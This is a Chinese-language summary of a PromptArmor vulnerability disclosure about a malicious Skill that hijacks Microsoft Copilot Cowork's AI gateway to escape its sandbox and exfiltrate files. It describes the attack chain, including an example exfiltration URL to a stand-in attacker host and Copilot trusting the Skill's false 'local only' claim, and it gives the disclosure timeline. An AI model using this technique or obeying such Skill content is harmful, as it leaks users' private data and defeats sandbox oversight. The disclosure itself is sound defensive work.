PromptArmor 披露 Copilot Cowork AI 网关被劫持绕过沙箱外传文件漏洞
Hijacking Copilot Cowork's AI Gateway to Bypass Sandboxing and Exfiltrate Files
PromptArmor 披露 Microsoft Copilot Cowork 的 AI 网关可被恶意 Skill 劫持以绕过沙箱并外传文件。
PromptArmor 完整披露了 Copilot Cowork 沙箱绕过的攻击链与时间线,读者可以据此评估 Skill 生态与沙箱设计的风险。
背景
Microsoft Copilot Cowork 是 M365 中的一个代理,它运行在沙箱中,该沙箱旨在阻止网络访问,并防止代理运行可触及任何不受信任服务的代码。
为了让 Copilot Cowork 生成响应,沙箱会将网络请求转发给 Anthropic。恶意 Skills 能够劫持这一通道,通过在 Anthropic 云中生成配备可访问攻击者服务器的网络工具的新代理来窃取数据。
无需人工在环审批,且该攻击可针对 Copilot 能访问的任何数据——从上传的文件,到 SharePoint、Teams、Outlook 等。
该漏洞于 2026 年 7 月 14 日披露给 Microsoft,并已于 2026 年 9 月 2 日修复。有关负责任披露的更多细节见文章底部。
攻击链
受害者上传一份他们想要审阅的敏感文档
受害者调用他们在网上找到的一个 Skill;该 Skill 隐藏了恶意提示和代码
Skills 经常在网上被找到并由用户上传,它们也可以在 M365 内组织内部共享。根据文档,“Skills 还可以包含最多 20 个配套文件(例如参考文档和脚本)”。与此 Skill 捆绑的一个脚本是恶意的。
受害者调用在网上找到的一个合同审阅 Skill Copilot Cowork 被恶意 Skill 操纵,进而运行恶意代码
恶意 Skill 的描述虚假声称“所有处理都在设备上运行,不会将任何文档内容传输给第三方服务。”在对该 Skill 的代码进行最低限度的审查后,Copilot 得出结论:“该脚本是一个安全的本地分析器——没有网络调用……让我现在运行它。”
当 Copilot 运行该代码时,它会在用户数据中搜寻,利用漏洞在沙箱外生成代理,并利用这些代理将受害者的数据窃取到攻击者的服务器。
Copilot 运行该 Skill 捆绑的代码,认为它是一个安全的本地分析器 恶意代码通过劫持 Copilot 的 AI 网关从沙箱中窃取数据
恶意 Skill 激活了 Copilot 自身用于生成响应的同一个 AI 网关。该 Skill 的代码在 Anthropic 云中启动代理。每个代理都带有受害者文档中的一句话、对网页抓取工具的访问权限,以及获取
attacker.com/?data={victim’s data here}的指令。攻击者的服务器会记录它收到请求的每个 URL,包括被附加到所请求 URL 上的受害者数据。恶意 Skill 激活本地 AI 网关,将数据发送给攻击者 攻击者可以在其服务器日志中读取受害者的合同
下方,攻击者的服务器日志显示了受害者被窃取的合同。然而,这种攻击同样可以轻易针对 SharePoint、Teams、Outlook 或与 Copilot 连接的其他来源中的任何数据。这是因为恶意 Skill 代码可以绕过模型直接调用 Copilot 的工具,正如我们此前关于 Copilot 中另一个沙箱绕过的研究所展示的那样。
攻击者的服务器日志中包含受害者的合同
负责任披露
该漏洞于 2026 年 7 月 14 日披露给 Microsoft,并已于 2026 年 9 月 2 日修复。
时间线
| 日期 | 事件 |
|---|---|
| 2026 年 7 月 14 日 | PromptArmor 向 Microsoft 披露 |
| 2026年7月14日 | Microsoft 确认收到 |
| 2026年8月17日 | Microsoft 确认所报告的行为 |
| 2026年9月2日 | Microsoft 确认已实施修复 |
PromptArmor 威胁情报
贵组织是否已防范供应商中的 AI 风险?
PromptArmor 持续监控您的第三方 AI 供应商、技能、插件、连接器、MCP 服务器、模型等资产组合。
我们检测此类漏洞和变更,在风险演变为事件之前将其揭示。
来源:PromptArmor:Threat Intelligence · promptarmor.com